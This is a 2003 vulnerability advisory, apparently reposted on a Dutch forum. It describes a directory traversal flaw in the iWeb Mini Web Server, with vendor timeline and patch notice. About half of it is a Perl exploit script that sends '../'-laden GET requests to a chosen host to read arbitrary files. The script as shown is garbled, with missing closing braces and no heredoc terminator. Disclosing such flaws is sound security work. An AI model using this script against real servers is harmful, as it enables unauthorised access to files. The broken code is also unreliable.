Bekijk Volledige Versie : SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

16/04/03, 15:20
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Title : iWeb Mini Web Server Remote Directory Traversal
Risk : Moderate - Low
Software : iWeb Mini Web Server
Platforms : Windows NT/XP/9x
Vendor URL : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive <subversive@linuxmail.org>
Advisory ID : SFAD03-001

......:[ Overview :

The iWeb Mini Web Server is a mini web server designed for use on
Intranets and for testing websites in a realistic environment.

......:[ Details :

iWeb does not correctly filter GET requests for ../ characters
thereby allowing us to escape the webroot and remotely traverse
the directory structure of the remote host.

......:[ Vendor Status :

14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version

......:[ Solution :

Remove old iWeb application and download and install the updated
version which can be found at:


......:[ Exploit - SF-iwsuk.pl :

#!/usr/bin/perl -w
# S e c u r i t y F r e a k s
# www.securityfreaks.com
# iWeb Mini Web Server Remote Directory Traversal
# subversive[at]linuxmail.org - *15/04/2003*

use IO::Socket;

if(!$ARGV[0]) {
print <<"IWEBSUK";

S e c u r i t y F r e a k s

SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
Usage: $0 <host> <file> <port>


$host = $ARGV[0];

if(!$ARGV[2]) {
$port = "80";

else {
$port = $ARGV[2];

my $sock = new IO::Socket::INET ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }

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